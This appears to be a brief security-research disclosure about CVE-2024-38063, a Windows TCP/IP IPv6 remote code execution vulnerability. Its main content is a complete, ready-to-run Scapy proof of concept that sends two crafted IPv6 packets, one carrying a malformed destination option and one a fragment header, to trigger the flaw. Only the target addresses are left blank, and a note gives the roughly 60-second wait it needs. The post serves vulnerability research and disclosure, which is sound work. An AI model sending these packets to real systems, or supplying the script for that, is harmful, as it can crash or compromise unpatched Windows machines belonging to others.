In August 2024, Microsoft released a patch for a Windows TCP/IP Remote Code Execution (RCE) vulnerability. Some researchers have already published Proofs of Concept(PoC) for this vulnerability, and around the same time, PatchPoint researchers also completed their analysis and reproduction of this issue. Due to the spread of misinformation across various platforms, including Twitter, it appears that the critical points required to trigger this vulnerability have been misunderstood. Contrary to these inaccuracies, we have decided to release a PoC that demonstrates how this vulnerability can be triggered with the transmission of only two packets.; In reality, a large number of packets is not necessary to trigger this vulnerability.
from scapy.all import *
IPAddr = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)
CVE-2024-38063_Demo.mp4
※ To trigger the vulnerability, a waiting time of approximately 60 seconds is required